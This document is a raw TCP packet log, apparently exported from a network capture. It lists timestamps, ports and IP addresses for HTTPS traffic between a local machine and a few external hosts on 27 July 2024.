Jul 27, 2024 08:54:14.392066002 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.392070055 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.392100096 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.392115116 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.410533905 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.410583019 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.410636902 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.410641909 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.410679102 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.410693884 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.411885977 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.411923885 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.411943913 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.411948919 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.411976099 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.411993027 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.412162066 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.412200928 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.412230015 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.412234068 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.412252903 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.412271976 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.412817955 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.412863970 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.412882090 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.412887096 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.412914991 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.412930965 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.434361935 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.434402943 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.434446096 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.434451103 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.434484959 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.456317902 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.456381083 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.456397057 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.456402063 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.456442118 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.456677914 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.456731081 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.456743956 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.456751108 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.456780910 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.456800938 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.484392881 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.484467983 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.484503984 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.484524012 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.484565973 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.484580994 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.501836061 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.501904011 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.501929998 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.501935005 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.501985073 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.502517939 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.502558947 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.502594948 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.502599001 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.502616882 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.502649069 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.502808094 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.502856016 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.502880096 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.502883911 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.502909899 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.502923965 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.506915092 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.506956100 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.507005930 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.507009983 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.507054090 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.525183916 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.525248051 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.525264978 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.525269032 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.525310040 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.545293093 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.545361996 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.545384884 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.545388937 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.545423985 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.545438051 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.547729969 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.547774076 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.547800064 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.547806025 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.547833920 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.547852993 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.574037075 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.574100971 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.574146032 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.574150085 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.574183941 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.574203014 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.592130899 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.592181921 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.592222929 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.592226982 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.592255116 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.592277050 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.593734026 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.593775034 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.593796015 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.593800068 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.593827009 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.593844891 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.594033003 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.594074965 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.594089031 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.594103098 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.594131947 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.594146013 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.595053911 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.595103979 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.595127106 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.595130920 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.595160961 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.595170021 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.616508007 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.616570950 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.616600990 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.616605043 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.616633892 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.616651058 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.636389017 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.636446953 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.636497021 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.636501074 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.636532068 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.636553049 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.636737108 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.636821032 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.636843920 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.636848927 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.636882067 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.636895895 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.664772987 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.664839983 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.664887905 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.664892912 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.664925098 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.664943933 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.683233976 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.683293104 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.683325052 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.683330059 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.683357954 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.683377981 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.684300900 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.684340954 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.684365988 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.684370995 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.684392929 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.684406996 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.684715986 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.684763908 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.684788942 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.684792995 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.684817076 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.684829950 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.686224937 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.686275005 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.686299086 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.686302900 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.686328888 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.686342955 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.707206964 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.707267046 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.707304955 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.707309008 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.707345963 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.707366943 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.727330923 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.727389097 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.727417946 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.727421999 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.727462053 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.727627993 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.727674007 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.727689981 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.727695942 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.727734089 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.757997990 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.758057117 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.758106947 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.758111954 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.758132935 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.758167982 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.774063110 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.774108887 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.774139881 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.774143934 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.774180889 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.774189949 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.775365114 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.775415897 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.775444984 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.775449038 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.775474072 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.775492907 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.775830984 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.775875092 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.775895119 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.775898933 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.775930882 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.775945902 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.776896000 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.776943922 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.776959896 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.776966095 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.777008057 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.797981977 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.798041105 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.798055887 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.798060894 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.798100948 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.818058968 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.818130970 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.818161964 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.818165064 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.818196058 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.818209887 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.818402052 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.818453074 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.818476915 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.818480968 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.818509102 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.818519115 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.848810911 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.848881006 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.848906994 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.848912001 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.848947048 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.848964930 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.849514961 CEST	443	50696	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:14.849678993 CEST	443	50696	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:14.850212097 CEST	50696	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:14.864418983 CEST	50696	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:14.864471912 CEST	443	50696	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:14.864526033 CEST	50696	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:54:14.864542007 CEST	443	50696	167.235.128.153	192.168.2.4
Jul 27, 2024 08:54:14.865246058 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.865289927 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.865314960 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.865320921 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.865359068 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.865376949 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.865906000 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.865956068 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.865968943 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.865984917 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.866017103 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.866025925 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.866317987 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.866364956 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.866379976 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.866384983 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.866410971 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.866422892 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.867825985 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.867871046 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.867901087 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.867906094 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.867932081 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.867952108 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.888813019 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.888860941 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.888884068 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.888887882 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.888914108 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.888931036 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.908616066 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.908663988 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.908703089 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.908706903 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.908734083 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.908751011 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.909348011 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.909389973 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.909418106 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.909423113 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.909456015 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.909466028 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.939552069 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.939594984 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.939728975 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.939734936 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.939781904 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.956075907 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.956116915 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.956161976 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.956166983 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.956196070 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.956207037 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.956989050 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.957051992 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.957056046 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.957078934 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.957107067 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.957123995 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.957489967 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.957534075 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.957546949 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.957555056 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.957585096 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.957603931 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.958553076 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.958595037 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.958619118 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.958623886 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.958647966 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.958661079 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.973234892 CEST	50697	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:14.973315954 CEST	443	50697	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:14.973412037 CEST	50697	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:14.973910093 CEST	50697	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:54:14.973946095 CEST	443	50697	107.173.160.137	192.168.2.4
Jul 27, 2024 08:54:14.979538918 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.979579926 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.979629993 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.979634047 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.979662895 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.979671001 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.999394894 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.999434948 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.999489069 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.999491930 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.999527931 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.999547958 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:14.999842882 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.999892950 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:14.999914885 CEST	50695	443	192.168.2.4	185.149.100.242
